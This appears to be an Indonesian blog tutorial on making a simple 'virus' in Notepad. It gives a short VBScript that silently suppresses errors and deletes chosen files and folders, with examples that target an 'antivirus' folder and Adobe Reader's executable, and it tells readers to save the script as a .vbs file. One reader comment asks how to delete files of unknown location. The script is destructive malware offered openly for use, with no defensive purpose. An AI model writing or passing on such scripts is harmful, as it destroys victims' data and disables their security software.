Membuat Virus Yang Dapat Menghapus File/Folder

Bookmark and Share
Huaaaahm, Akhirnya Tutorial membuat virus sederhana ditulis lagi.

Nah, pada edisi kali ini (caelah edisi, emang dikira majalah apa, hehe), Pintu Kaya cuma mau share sedikit tnetang cara membuat virus. Saat ini Virus yang kita buat masih menggunakan notepad. Jadi persiapkanlah Notepad anda sekalian.

Oke, biar nggak pake lama. Kita langsung aja dhe ke cara-caranya:

Masuk Notepad kemudian tulis script di bawah ini, agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:

On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)

Contoh :
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”
Simpan script tersebut dalam bentuk file.vbs, misal: virusdeleted.vbs

Nah, gimana?? Mudah bukan??

Related Post



{ 1 Komentar... Views All / Post Comment! }

Reza Aziz mengatakan...

kalo misal mau menghapus file yang nggak diketahui lokasinya gmana nih?

Posting Komentar